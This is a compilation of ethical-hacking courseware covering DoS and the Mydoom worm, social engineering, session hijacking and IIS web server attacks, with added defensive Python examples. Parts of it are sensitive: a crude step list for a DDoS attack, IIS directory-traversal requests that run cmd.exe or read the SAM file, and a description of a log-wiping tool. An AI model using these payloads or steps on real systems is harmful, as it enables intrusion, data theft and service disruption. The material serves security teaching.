Due to a decreased rate of submissions, Symantec Security Response has downgraded this threat from a Category 3 to a Category 2 rating as of March 30, 2004.

W32.Mydoom.A@mm (also known as W32.Novarg.A) is a mass-mailing worm that arrives as an attachment with the file extension .bat, .cmd, .exe, .pif, .scr, or .zip.

When a computer is infected, the worm sets up a backdoor into the system by opening TCP ports 3127 through 3198, which can potentially allow an attacker to connect to the computer and use it as a proxy to gain access to its network resources.

In addition, the backdoor can download and execute arbitrary files.

There is a 25% chance that a computer infected by the worm will perform a Denial of Service (DoS) on February 1, 2004 starting at 16:09:18 UTC, which is also the same as 08:09:18 PST, based on the machine's local system date/time. If the worm does start the DoS attack, it will not mass mail itself. It also has a trigger date to stop spreading/DoS-attacking on February 12, 2004. While the worm will stop on February 12, 2004, the backdoor component will continue to function after this date.
How to Conduct a DDoS Attack

Step 1. Write a virus that will send ping packets to a target network or website.

Step 2. Infect a minimum of 30,000 computers with this virus and turn them into "zombies".

Step 3. Trigger the zombies to launch the attack by sending wake-up signals to them, or have them activated by certain data.

Step 4. The zombies will keep attacking the target server until they are disinfected.
Summary

• DoS attacks can prevent the usage of a system by its legitimate users by overloading its resources.

• They can result in a disabled network, a disabled organization, financial loss, and loss of goodwill.

• Smurf, buffer overflow, Ping of Death, Teardrop, SYN, and Tribe Flood Network attacks are some of the types of DoS attacks, and WinNuke, Targa, Land, and Bubonic.c are some of the tools used to achieve DoS.

• A DDoS attack is one in which a multitude of compromised systems attack a single target.

Summary

• DDoS attacks can be bandwidth depletion or amplification attacks.

• Trinoo, TFN, TFN2K, Stacheldraht, Shaft, and Trinity are some of the DDoS attack tools.

• Countermeasures include preventing secondary victims, detecting and neutralizing handlers, detecting or preventing the attack, mitigating or stopping the attack, and deflecting the attack.







Ethical Hacking

Module IX
Social Engineering

Module Objective

• What is Social Engineering?
• Common Types of Attacks
• Social Engineering by Phone
• Dumpster Diving
• Online Social Engineering
• Reverse Social Engineering
• Policies and Procedures
• Employee Education
Module Flow

[Figure: module flow diagram; recoverable labels are "Computer-Based Social Engineering" and "Reverse Social Engineering"]
What is Social Engineering?

• Social Engineering is the human side of breaking into a corporate network.

• Companies with authentication processes, firewalls, virtual private networks, and network monitoring software are still wide open to attack.

• An employee may unwittingly give away key information in an email, by answering questions over the phone from someone they don't know, or even by talking about a project with coworkers at a local pub after hours.
Art of Manipulation

• Social Engineering is the acquisition of sensitive information or inappropriate access privileges by an outsider, based on building inappropriate trust relationships with insiders.

• The goal of a social engineer is to trick someone into providing valuable information or access to that information.

• It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people, and the fear of getting into trouble.
Human Weakness

• People are usually the weakest link in the security chain.

• A successful defense depends on having good policies in place and educating employees to follow the policies.

• Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.
Common Types of Social Engineering

• Social Engineering can be broken into two types: human based and computer based.

1. Human-based Social Engineering refers to person-to-person interaction to retrieve the desired information.

2. Computer-based Social Engineering refers to having computer software that attempts to retrieve the desired information.
Human-Based: Impersonation

Human-based social engineering techniques can be broadly categorized into:

• Impersonation
• Posing as an Important User
• Third-person Approach
• Technical Support
• In Person
  • Dumpster Diving
  • Shoulder Surfing
Example

A man calls a company help desk and says he's forgotten his password. In a panic, he adds that if he misses the deadline on a big advertising project his boss might even fire him. The help desk worker feels sorry for him and quickly resets the password, unwittingly giving the hacker clear entrance into the corporate network.

A man is in back of the building loading the company's paper recycling bins into the back of a truck. Inside the bins are lists of employee titles and phone numbers, marketing plans and the latest company financials. This information is sufficient to launch a social engineering attack on the company.
Computer-Based Social Engineering

• These can be divided into the following broad categories:
  • Mail / IM attachments
  • Pop-up windows
  • Websites / sweepstakes
  • Spam mail

[Screenshot of an e-mail lure. Subject: "Cool Photo of Anna Kournikova". Body: "How was your holidays? Please take a look at the censored Anna Kournikova image. Best regards." The attachment is a Trojan.]
Reverse Social Engineering

• A more advanced method of gaining illicit information is known as "reverse social engineering".

• This is when the hacker creates a persona that appears to be in a position of authority, so that employees will ask him for information, rather than the other way around.

• The three parts of a reverse social engineering attack are sabotage, advertising, and assisting.
Mary has cracked Janie's password!!!!

She did not even use a system. All she did was use social engineering on Janie. That day, in the afternoon, Mary came to find out that Janie, her colleague, had stored some important client files in her mailbox. Mary wanted that client list, as she could easily meet the sales target with the help of that information.

Mary and Janie had been working as sales managers for almost 5 years in the organization, and so they knew each other well. Mary asked Janie to meet her at a restaurant that evening for an informal chat session. Unaware of Mary's intentions, Janie agreed to come.

At the restaurant, Mary asked some personal questions which could help her in guessing Janie's password. And it really helped. In the course of their conversation, Janie revealed her secret password to Mary.

Just think about what Janie will face after Mary breaks into her mailbox. To make matters worse, she may even become a victim of identity theft.
Policies and Procedures

• Policy is the most critical component of any information security program.

• Good policies and procedures are not effective if they are not taught to and reinforced by the employees.

• Employees need to be taught to appreciate their importance. After receiving training, the employee should sign a statement acknowledging that they understand the policies.

Policies and Procedures Checklist

• Account setup
• Password change policy
• Help desk procedures
• Access privileges
• Violations
• Employee identification
• Privacy policy
• Paper documents
• Modems
• Physical access restrictions
• Virus control
Summary

• Social Engineering is the human side of breaking into a corporate network.

• Social Engineering involves acquiring sensitive information or inappropriate access privileges by an outsider.

• Human-based Social Engineering refers to person-to-person interaction to retrieve the desired information.

• Computer-based Social Engineering refers to having computer software that attempts to retrieve the desired information.

• A successful defense depends on having good policies in place and implementing them diligently.
Ethical Hacking

Module X
Session Hijacking

Scenario

Nick works as a trainee in the purchasing department of a manufacturing plant. Most transactions are done online through sessions with the vendors.

He had high job expectations and slogged for hours in the hope of getting a better job role. His boss was indifferent to his hard work and was more influenced by the sycophants. After a year, all his colleagues got promoted. Nick was flustered. He decided that it was payback time for his boss...

Picture Source: http://benjamin.hodgens.net/blak^geek.jpg
Module Objective

• Spoofing vs. Hijacking
• Types of Session Hijacking
• TCP/IP Concepts
• Performing Sequence Prediction
• ACK Storms
• Session Hijacking Tools

Module Flow

[Figure: module flow: Understanding Session Hijacking -> Session Hijacking Steps -> Session Hijacking Tools -> Countermeasures]

Understanding Session Hijacking

• Understanding the flow of message packets over the Internet by dissecting the TCP stack.

• Understanding the security issues involved in the use of the IPv4 standard.

• Becoming familiar with the basic attacks possible due to the IPv4 standard.
Session Hijacking

[Figure: two identical protocol stacks (Application Layer, Transport Layer, Network Layer, Data Link Layer, Hardware) side by side. The "Virtual Connection" that a session hijacker takes over exists between the application layers; the "Actual Connection" runs between the hardware.]
Spoofing vs. Hijacking

A spoofing attack is different from a hijack in that the attacker is not actively taking another user offline to perform the attack. He pretends to be another user or machine to gain access.

With hijacking, an attacker is taking over an existing session, which means he is relying on the legitimate user to make the connection and authenticate. After that, the attacker takes over the session.
Steps in Session Hijacking

1. Tracking the session
2. Desynchronizing the connection
3. Injecting the attacker's packet
Types of Session Hijacking

There are two types of session hijacking attacks:

• Active
  • In an active attack, an attacker finds an active session and takes it over.
• Passive
  • With a passive attack, an attacker hijacks a session, but sits back and watches and records all the traffic that is being sent back and forth.
The 3-Way Handshake

BOB -> SERVER:  SYN      Seq: 4000
SERVER -> BOB:  SYN/ACK  Seq: 7000, Ack: 4001
BOB -> SERVER:  ACK      Ack: 7001

If the attacker can anticipate the next number Bob will send, he will spoof Bob's address and start communication with the server.
TCP Concepts: 3-Way Handshake

Bob initiates a connection with the server. Bob sends a packet to the server with the SYN bit set.

The server receives this packet and sends back a packet with the SYN bit set and an ISN (Initial Sequence Number) for the server.

Bob sets the ACK bit, acknowledging the receipt of the packet, and increments the sequence number by 1.

The two machines have successfully established a session.
Sequence Numbers

• Sequence numbers are important in providing reliable communication and are also crucial for hijacking a session.
• Sequence numbers are a 32-bit counter. Therefore, there are over 4 billion possible values.
• The sequence numbers are used to tell the receiving machine what order the packets should go in when they are received.
• Therefore, an attacker must successfully guess the sequence number in order to hijack a session.
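The handshake from the three slides above, worked through in code. This is an added example, not part of the courseware: it models the two endpoints with the slide's numbers (Bob's ISN 4000, the server's ISN 7000), shows the seq/ack values each side ends up expecting, and shows why a segment whose numbers are even one step off is dropped. The generate_isn() function is a simplified RFC 6528 style generator (clock plus keyed hash of the 4-tuple); the key and addresses are constructed for the demo.

```python
import hashlib
import time

SEQ_MOD = 2 ** 32  # sequence numbers are a 32-bit counter, so all arithmetic wraps


def generate_isn(local, remote, secret_key, ticks=None):
    """Unpredictable ISN in the style of RFC 6528: a 4-microsecond clock plus a keyed
    hash of the connection 4-tuple. Simplified illustration (assumption): real stacks
    use a kernel-held key and a different hash, but the construction is the same."""
    if ticks is None:
        ticks = time.monotonic_ns() // 4000  # 4-microsecond ticks
    material = f"{local[0]}:{local[1]}->{remote[0]}:{remote[1]}".encode() + secret_key
    offset = int.from_bytes(hashlib.sha256(material).digest()[:4], "big")
    return (ticks + offset) % SEQ_MOD


class Endpoint:
    """One side of a TCP connection, tracking only what the handshake needs."""

    def __init__(self, name, isn):
        self.name = name
        self.snd_nxt = isn    # next sequence number this side will send
        self.rcv_nxt = None   # next sequence number expected from the peer
        self.state = "CLOSED"

    def accepts(self, seq, ack):
        """Stricter than a real stack (which allows a window of values): a segment is
        accepted only if it carries exactly the expected seq and acknowledges exactly
        what this side has sent. Anything else is treated as off-window and dropped."""
        return self.state == "ESTABLISHED" and seq == self.rcv_nxt and ack == self.snd_nxt


def three_way_handshake(bob, server):
    """Run the slide's handshake; returns the three segments as (flags, seq, ack)."""
    # 1. Bob -> server: SYN carrying Bob's ISN (4000 on the slide)
    syn = ("SYN", bob.snd_nxt, None)
    bob.snd_nxt = (bob.snd_nxt + 1) % SEQ_MOD   # the SYN consumes one sequence number
    server.rcv_nxt = bob.snd_nxt                # server now expects 4001 from Bob
    # 2. server -> Bob: SYN/ACK with the server's ISN (7000) and ack = 4001
    syn_ack = ("SYN/ACK", server.snd_nxt, server.rcv_nxt)
    server.snd_nxt = (server.snd_nxt + 1) % SEQ_MOD
    bob.rcv_nxt = server.snd_nxt                # Bob now expects 7001 from the server
    # 3. Bob -> server: ACK with seq = 4001 and ack = 7001
    ack = ("ACK", bob.snd_nxt, bob.rcv_nxt)
    bob.state = server.state = "ESTABLISHED"
    return [syn, syn_ack, ack]


def demo():
    """Handshake with the slide's numbers, then show which follow-up segments the
    server would accept: (segments, genuine_accepted, wrong_numbers_accepted)."""
    bob = Endpoint("Bob", 4000)
    server = Endpoint("server", 7000)
    segments = three_way_handshake(bob, server)
    genuine = server.accepts(seq=4001, ack=7001)   # Bob's real next segment
    forged = server.accepts(seq=4001, ack=7000)    # numbers one step off: dropped
    return segments, genuine, forged


if __name__ == "__main__":
    segs, ok, bad = demo()
    for flags, seq, ack in segs:
        print(f"{flags:8} seq={seq} ack={ack}")
    print("genuine segment accepted:", ok, "| off-by-one segment accepted:", bad)
    # With a predictable ISN (e.g. a plain counter) a third party can compute these
    # values; an RFC 6528 style ISN ties them to a secret the third party lacks.
    key = b"constructed demo key"
    print("ISN for 10.0.0.1:1024 -> 10.0.0.2:23:",
          generate_isn(("10.0.0.1", 1024), ("10.0.0.2", 23), key))
```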
Programs That Perform Session Hijacking

There are several programs available that perform session hijacking. Following are a few that belong in this category:

• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
Hacking Tool: Juggernaut

http://www.l0t3k.org/tools/Spoofing/L2.tar.gz

• Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux operating systems.
• Juggernaut can be set to watch for all network traffic, or it can be given a keyword (e.g. a password) to look out for.
• The objective of this program is to provide information about ongoing network sessions.
• The attacker can see all the sessions and choose a session to hijack.
Hacking Tool: Hunt

http://lin.fsid.cvut.cz/~kra/index.html

• Hunt is a program that can be used to listen to, intercept, and hijack active sessions on a network.
• Hunt offers:
  • Connection management
  • ARP spoofing
  • Resetting connections
  • Watching connections
  • MAC address discovery
  • Sniffing TCP traffic
Hacking Tool: TTY Watcher

http://www.cerias.purdue.edu

• TTY-Watcher is a utility to monitor and control users on a single system.
• Sharing a TTY: anything the user types into a monitored TTY window will be sent to the underlying process. In this way, you are sharing a login session with another user.
• After a TTY has been stolen, it can be returned to the user as though nothing happened.

(Available only for Sun Solaris systems.)
Hacking Tool: IP Watcher

http://engarde.com

• IP Watcher is a commercial session hijacking tool that allows you to monitor connections and has active facilities for taking over a session.
• The program can monitor all connections on a network, allowing an attacker to display an exact copy of a session in real time, just as the user of the session sees the data.

[Screenshot: IP Watcher window showing the local IP (127.0.0.1) and hostname fields.]
T-Sight

http://engarde.com

• T-Sight, an advanced intrusion investigation and response tool for Windows NT and Windows 2000, can assist you when an attempt at a break-in or compromise occurs.
• With T-Sight, you can monitor all your network connections (i.e. traffic) in real time and observe the composition of any suspicious activity that takes place.
• T-Sight has the capability to hijack any TCP session on the network.
• For security reasons, Engarde Systems licenses this software to pre-determined IP addresses.
[Screenshot: T-Sight connection view of a telnet session, "Connection Data: 192.168.200.92 [1056] <-> 192.168.200.98 [23]". The pane shows the captured terminal output of a "dir" command run on the server (a Windows C:\ directory listing), the raw telnet negotiation bytes, the session status "Active", and the controls Terminate, Take Over, No Macros, Send (Client) and Send (Server).]
T-Sight

[Screenshot: T-Sight Realtime window listing monitored connections (telnet[23]/tcp, domain[53], netbios-ns, netbios-dgm) with start/end dates and times, source and destination hosts and ports for 192.168.200.92, 192.168.200.94, 192.168.200.96 and 192.168.100.12, and the log of the selected session "192.168.200.92 [1056] -> 192.168.200.98 [23]" (Time: 12/15/02 00:45:40 -> NOW, Packet Stats: 0.06% dropped, Interest Threshold: 1). Buttons: Realtime, Playback, Generate.]
Remote TCP Session Reset Utility

[Screenshot: "Remote TCP Session Reset" window (SolarWinds.Net Network Management Tools). The operator enters a router, switch or server name/IP and a read-write SNMP community string ("private"), connects, and the tool downloads the device's TCP session table. The table lists connection state, server IP address and port, client IP address and port; here two Established telnet sessions from 208.191.22.50 (client ports 3529 and 3530) to 216.60.197.254 port 23. A "Break" button resets the selected session. Status bar: "TCP Session Table download complete."]
Scenario (Cont...)

Nick captures the authentication tokens of his boss's session with the supply vendors and gets access to all the vital information needed to take over his account.

• What next?
  • He can impersonate his boss
  • Place orders
  • Cause loss of goodwill with the vendors
  • Circulate malicious material from his boss' account
  • Change the account password and cause closure of the account, leading to loss of important documents
Dangers Posed by Hijacking

1. Most computers are vulnerable
2. Little can be done to protect against it
3. Hijacking is simple to launch
4. Most countermeasures do not work
5. Hijacking is very dangerous (theft of identity, fraud, etc.)
Protecting Against Session Hijacking

1. Use encryption
2. Use a secure protocol
3. Limit incoming connections
4. Minimize remote access
5. Educate the employees
Countermeasure: IP Security

• It is a set of protocols developed by the IETF to support secure exchange of packets at the IP layer.
• Deployed widely to implement Virtual Private Networks (VPNs).
• IPsec supports two encryption modes:
  • Transport
  • Tunnel
  • The sending and receiving devices must share a public key.
IP-SEC

http://h30097.www3.hp.com/unix/ipsec/

[Screenshot: an IPsec VPN tunnel configuration dialog (French-language GUI). The tree lists, for each peer (Gwind, PIX, VPN3000, OpenBSD), an Authentication (Phase 1) node with one or two proposals and a Key exchange (Phase 2) node with one proposal, with New and Delete buttons. An "Advanced configuration (PSK and PKI)" panel offers a "respond only" action mode and certificate exchange options: send the certificate, and request the certificate if it does not exist locally.]
Summary

• In the case of session hijacking, an attacker relies on the legitimate user to connect and authenticate, and then takes over the session.
• In a spoofing attack, the attacker pretends to be another user or machine to gain access.
• Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control.
• Session hijacking can be active or passive in nature, depending on the degree of involvement of the attacker in the attack.
• A variety of tools exist to aid the attacker in perpetrating a session hijack.
• Session hijacking can be very dangerous and there is a need for implementing strict countermeasures.
Ethical Hacking

Module XI
Hacking Web Servers



Scenario

Jason is the Systems Engineer in an IT firm. Recently, Jason lost all his savings in an investment proposal when the share prices of his portfolio plummeted. Now Jason is in huge debt.

He has been tempted with a huge amount of money by a rival firm to steal some secret documents from his company. He refuses initially, but repeated calls from the rivals make him change his mind.

1. What can Jason do to successfully carry out the act?
2. Will Jason first attempt to hide his presence on the system, and then remain there quietly for some time, observing file transfers?
3. Will he look for specific unpatched software so that he can exploit some vulnerabilities?
Module Objective

• Introduction to Web Servers
• Popular Web Servers and Common Vulnerabilities
• Apache Web Server Security
• IIS Server Security
• Attacks Against Web Servers
• Tools used in Attack
• Countermeasures
• Increasing Web Server Security

Copyright © by EC-Council
EC-Council. All Rights reserved. Reproduction is strictly prohibited



Module Flow

Introduction to Web Servers -> Vulnerabilities in Apache -> IIS Vulnerabilities -> IIS Components -> Hacking Tools to Exploit Vulnerabilities -> Vulnerability Scanners -> Countermeasures
How Web Servers Work

[Figure: a machine running a web browser and a server machine running a web server. Arrow 1: the browser connects to the server and requests a page. Arrow 2: the server sends back the requested page.]
How Web Servers Work

1. The browser breaks the URL into three parts:
   1. The protocol ("http")
   2. The server name ("www.website.com")
   3. The filename ("webpage.html")
2. The browser communicates with a name server, which translates the server name, www.website.com, into an IP address.
3. The browser then forms a TCP connection to the web server at that IP address on port 80.
4. Following the HTTP protocol, the browser sends a GET request to the server, asking for the file http://webpage.html
5. The server sends the HTML text for the web page to the browser.
6. The browser reads the HTML tags and formats the page onto the screen.
How are Web Servers Compromised?

• Misconfigurations: in operating systems or networks
• Bugs: OS bugs may allow commands to be run on the web server
• Installing the server with defaults: service packs may not be applied in the process, leaving holes behind
• Lack of proper security policy, procedures, and maintenance may create many loopholes for attackers to exploit
Popular Web Servers and Common Security Threats

• Apache Web Server
• IIS Web Server
• Sun ONE Web Server
• Nature of Security Threats in a Web Server Environment:
  • Bugs or Web Server Misconfiguration
  • Browser-Side or Client-Side Risks
  • Sniffing
  • Denial of Service Attack
Apache Vulnerability

• Apache Week tracks the vulnerabilities in Apache Server. Even Apache has its share of bugs and fixes.
• For instance, consider the vulnerability which was found in the Win32 port of Apache 1.3.20.
  • Long URLs passing through the mod_negotiation, mod_dir and mod_autoindex modules could cause Apache to list directory contents.
  • The concept is simple but requires a few trial runs.
  • A URL with a large number of trailing slashes:
    - /cgi-bin//////////////////////////////// could produce a directory listing of the original directory.
Attacks Against IIS

• IIS is one of the most widely used web server platforms on the Internet.
• Microsoft's web server has been a frequent target over the years.
• It has been attacked through various vulnerabilities. Examples include:
  • ::$DATA vulnerability
  • showcode.asp vulnerability
  • Piggybacking vulnerability
  • Privileged command execution
  • Buffer overflow exploits (IIShack.exe)
IIS Components

• IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities. Examples: server-side scripting, content indexing, web-based printing, etc.
• This architecture provides attackers with different functionality to exploit via malicious input.

[Figure: IIS SERVER at the centre, surrounded by ASP.DLL, ISAPI.DLL, PRL.DLL, ASPNET.DLL and Msw3prt.dll.]
Sample Buffer Overflow Vulnerabilities

• One of the most extreme security vulnerabilities associated with ISAPI DLLs is the buffer overflow.
• There is a buffer overflow in IIS within the ISAPI filter that handles printer files that provide support for the Internet Printing Protocol (IPP).

The vulnerability arises when a buffer of approximately 420 bytes is sent to the HTTP host. Ex: GET /NULL.printer HTTP/1.0 HOST: [buffer]
IIS Directory Traversal

• The vulnerability results because of a canonicalization error affecting CGI scripts and ISAPI extensions (.ASP is probably the best known ISAPI-mapped file type).
• Canonicalization is the process by which various equivalent forms of a name can be resolved to a single, standard name.
• For example, "%c0%af" and "%c1%9c" are overlong representations for '/' and '\'.
• Thus, by feeding an HTTP request like the following to IIS, arbitrary commands can be executed on the server:

GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
Proof of concept

• ASCII characters for the dots are replaced with the Unicode equivalent (%2E).
• ASCII characters for the slashes are replaced with the Unicode equivalent (%c0%af).
• Unicode 2.0 allows multiple encoding possibilities for each character.
• Unicode for "/": 2f, c0af, e080af, f08080af, f8808080af, ...
• Overlong Unicode is NOT malformed, but it is not allowed by a correct Unicode encoder and decoder.
• Maliciously used to bypass filters that only check short Unicode.

Note: Unicode is discussed here as proof of concept
Unicode Directory Traversal Vulnerability

• Occurs due to a canonicalization error in Microsoft IIS 4.0 and 5.0
• A malformed URL could be used to access files and folders that lie anywhere on the logical drive that contains the web folders
• This allows the attacker to escalate his privileges on the machine
• This would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it
• This vulnerability can be exploited by using NETCAT as the backdoor (Trojan horse)
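What a correct canonicalization step looks like, as an added example (not part of the courseware and not IIS code): decode the percent-encoding once to raw bytes, insist on strictly valid UTF-8 so that the overlong forms shown on the slides (%c0%af, %e0%80%af, %c1%9c, ...) are rejected before they can become separators, refuse double encoding, and only then normalise the path and compare it against the web root. The web root /inetpub/wwwroot and the sample request paths are constructed for the demo.

```python
import posixpath
import re

PERCENT = re.compile(r"%([0-9A-Fa-f]{2})")
WEB_ROOT = "/inetpub/wwwroot"   # assumed document root for the demo


def percent_decode_bytes(path):
    """One round of percent-decoding to raw bytes; no charset is assumed yet."""
    out = bytearray()
    i = 0
    while i < len(path):
        m = PERCENT.match(path, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out += path[i].encode("utf-8")
            i += 1
    return bytes(out)


def canonicalize(uri_stem, web_root=WEB_ROOT):
    """Resolve a request path to its single canonical form, or raise ValueError.

    The order matters: decode bytes, then require strictly valid UTF-8 (this is where
    the slides' overlong forms %c0%af and %c1%9c are thrown out), then normalise the
    path, and only then compare it against the web root."""
    raw = percent_decode_bytes(uri_stem)
    try:
        text = raw.decode("utf-8")   # Python's codec rejects overlong sequences
    except UnicodeDecodeError as exc:
        raise ValueError(f"invalid or overlong UTF-8 at byte {exc.start}") from None
    if "%" in text:
        # ..%255c.. decodes to ..%5c..; a second decode would turn it into a separator.
        # A literal '%' in a file name is rare enough to reject conservatively.
        raise ValueError("double-encoded path")
    if any(ord(ch) < 0x20 for ch in text):
        raise ValueError("control character in path")
    text = text.replace("\\", "/")   # IIS accepts backslash as a separator as well
    resolved = posixpath.normpath(posixpath.join(web_root, text.lstrip("/")))
    if resolved != web_root and not resolved.startswith(web_root + "/"):
        raise ValueError("path escapes the web root")
    return resolved


def is_safe(uri_stem):
    """True if canonicalize() accepts the path, False if it rejects it."""
    try:
        canonicalize(uri_stem)
        return True
    except ValueError:
        return False


# Constructed sample requests: the first two are legitimate; the rest use the
# encodings shown on the slides (two-, three- and four-byte overlong '/', an
# overlong '\', double encoding) plus a plain dot-dot escape.
SAMPLES = [
    "/default.htm",
    "/scripts/test.asp",
    "/scripts/..%c0%af../winnt/system32/cmd.exe",
    "/scripts/..%e0%80%af../winnt/system32/cmd.exe",
    "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe",
    "/msadc/..%255c../winnt/system32/cmd.exe",
    "/scripts/../../winnt/system32/cmd.exe",
]


def verdicts(paths=SAMPLES):
    """Map each path to its canonical form or to the rejection reason."""
    result = {}
    for p in paths:
        try:
            result[p] = "OK " + canonicalize(p)
        except ValueError as exc:
            result[p] = "REJECT " + str(exc)
    return result


if __name__ == "__main__":
    for path, verdict in verdicts().items():
        print(f"{verdict:45}  {path}")
```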
Proof of concept

Hacking Tool: IISxploit.exe

[Screenshot: "IIS Xploit v1.0 by GrEeK_pIrAtE" window with menu items File, IIS Related Links and Help, an Address field, and fields for a file to download, a file to upload, a file to run and a file to rename (e.g. C:\Test\text.txt).]

This tool automates the directory traversal exploit in IIS

Proof of concept
Msw3prt IPP Vulnerability

• The ISAPI extension responsible for IPP is msw3prt.dll.
• An oversized print request containing valid program code can be used to perform a new function or load a different, separate program and cause a buffer overflow.
WebDAV / ntdll.dll Vulnerability

• WebDAV stands for "Web-based Distributed Authoring and Versioning."
• The IIS WebDAV component utilizes ntdll.dll when processing incoming WebDAV requests. By sending a specially crafted WebDAV request to an IIS 5.0 server, an attacker may be able to execute arbitrary code in the Local System security context, essentially giving the attacker complete control of the system.
• This vulnerability enables attackers to cause:
  • Denial-of-service against Win2K machines.
  • Execution of malicious code.

[Figure: System Service Table with entries NtCreateFile, NtReadFile and NtClose. Source: http://www.sysinternals.com/images/screenshots/ntdll.gif]

Proof of concept
Real World Instance of WebDAV Exploit

[Screenshot of a Computerworld web page, Home > Browse Topics > Security > Hacking:]

U.S. Army Web servers hacked
News Story by Dan Verton

MARCH 18, 2003 (COMPUTERWORLD) - WASHINGTON - Hackers on March 11 infiltrated an undisclosed number of U.S. Army Web servers, taking advantage of a previously undisclosed buffer-overflow vulnerability in a component of Microsoft Corp.'s Windows 2000 that is used to manage the Web Distributed Authoring And Versioning (WebDAV) protocol.

Security experts ... example of a "0-day" exploit, referring to an exploit that takes advantage of a vulnerability nobody is aware of and for which there is no available patch. (see story). However, Microsoft issued a fix yesterday for the vulnerab... Security vendors are also advising users that there are work-arounds that can be implemented immediately to reduce ... vulnerability.

WebDAV, which is installed by default with Internet Information Server (IIS) Version 5.0, allows documents to be assigned properties and attributes and enables collaborative creation, editing and searching from remote locations. It also enables documents to be writ...

Related to this topic: Update: Army denies hacking incident; Microsoft confident bounties will nab virus writers; Hackers take advantage of Microsoft ASN flaw
Hacking Tool: "KaHT"

• The tool scans for WebDAV-vulnerable machines, compromises the system with a custom script and then installs a tool kit on the victim machine.
• The tool kit is reported to add the user "KaHT" to the Administrators group.
[Screenshot: "[Crpt] ntdll.dll/WebDAV exploit v0.2 by kralor [Crpt]" window with target, padding and callback address/port fields, custom pads, Exploit and Stop buttons, and a status pane reporting the stages building buffer, checking WebDAV, connecting and trying a return address. Footer: "coded by kralor, visit crpt team at http://www.coromputer.net".]

Proof of concept
RPC DCOM Vulnerability

• It exists in the Windows Component Object Model (COM) subsystem, which is a critical service used by many Windows applications.
• The DCOM service allows COM objects to communicate with one another across a network and is activated by default on Windows NT, 2000, XP, and 2003.
• Attackers can reach the vulnerability in COM via any of the following ports:
  • TCP and UDP port 135 (Remote Procedure Call)
  • TCP ports 139 and 445 (NetBIOS)
  • TCP port 593 (RPC-over-HTTP)
  • Any IIS HTTP/HTTPS port if COM Internet Services are enabled
• ASN, or Abstract Syntax Notation, is used for representing different types of binary data such as numbers or strings of text.
• The ASN.1 exploit targets a Windows authentication protocol known as NT LAN Manager V2, or NTLMv2.
• The attacker can run a program that will cause machines using a vulnerable version of the ASN.1 library to reboot, producing a so-called denial-of-service attack.
IIS Logs

• IIS logs all the visits in log files. The log file is located at: <%systemroot%>\logfiles
• If proxies are not used, then the client IP can be logged
• This command lists the log files:

http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\Winnt\system32\Logfiles\W3SVC1
Network Tool: Log Analyzer

This tool helps to grab web server logs and build graphically rich, self-explanatory reports on website usage statistics, referring sites, traffic flow, search phrases, etc.

[Screenshot: AlterWind Log Analyzer, "My Logs List" window listing the loaded log files:]

Log FileName                  | File Date           | Start log date      | End log date        | Lines
D:\logs\access20020617.log    | 30/06/2002 18:03:24 | 16/06/2002 23:56:08 | 17/06/2002 23:45:21 | 39730
D:\logs\access20020618.log    | 30/06/2002 18:03:30 | 18/06/2002 00:02:14 | 18/06/2002 23:50:59 | 34857
D:\logs\access20020619.log    |                     |                     |                     |
D:\logs\access20020620.log    | 30/06/2002 18:03:40 | 19/06/2002 23:55:58 | 20/06/2002 23:54:03 | 52978
D:\logs\access20020621.log    | 30/06/2002 18:03:44 | 21/06/2002 00:05:46 | 21/06/2002 23:55:00 | 39513
D:\logs\access20020622.log    | 30/06/2002 18:03:50 | 21/06/2002 23:56:03 | 22/06/2002 23:43:58 | 30416
D:\logs\access20020623.log    | 30/06/2002 18:03:54 | 23/06/2002 00:05:17 | 23/06/2002 23:46:23 | 19218
Hacking Tool: CleanIISLog

• This tool clears the log entries in the IIS log files, filtered by an IP address.
• An attacker can easily cover his trace by removing entries based on his IP address in the W3SVC log files.

[Screenshot: a Notepad window showing the kind of entries the tool removes:]

Jun 10 12:53:37.84 4.5.6.7 op=GET arg=http://Target IP/msadc/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\*.cif/s/b result="500 Server Error"
Jun 10 12:53:39.575 4.5.6.7 op=GET arg=http://Target IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not Found"
Jun 10 12:53:43.578 4.5.6.7 op=GET arg=http://Target IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not Found"
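The defender's side of the two log slides above (IIS Logs and CleanIISLog), as an added example that is not part of the courseware: parse the W3C extended log format that IIS writes, flag requests whose path carries the traversal encodings shown earlier in the module (overlong UTF-8, double encoding, dot-dot segments), and group the hits by client IP, since that IP is exactly what a log cleaner would filter on and what a copy shipped off the host preserves. The log lines and addresses are constructed for the demo.

```python
import re
from collections import defaultdict

# Request-path patterns matching the encodings on the slides: two-, three- and
# four-byte overlong UTF-8 forms, double encoding (%25xx), and dot-dot segments
# with either separator (or a percent-encoded one right after the dots).
OVERLONG = re.compile(
    r"%c[01]%[89ab][0-9a-f]|%e0%80%[89ab][0-9a-f]|%f0%80%80%[89ab][0-9a-f]", re.I)
DOUBLE_ENCODED = re.compile(r"%25[0-9a-f]{2}", re.I)
DOT_DOT = re.compile(r"(^|[/\\])\.\.($|[/\\%])")

# Constructed sample in IIS W3C extended format (the #Fields line drives parsing).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-06-10 12:53:37
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-06-10 12:53:37 10.1.1.5 GET /default.htm - 200
2002-06-10 12:53:39 4.5.6.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2002-06-10 12:53:41 4.5.6.7 GET /msadc/..%255c../winnt/system32/cmd.exe /c+dir 500
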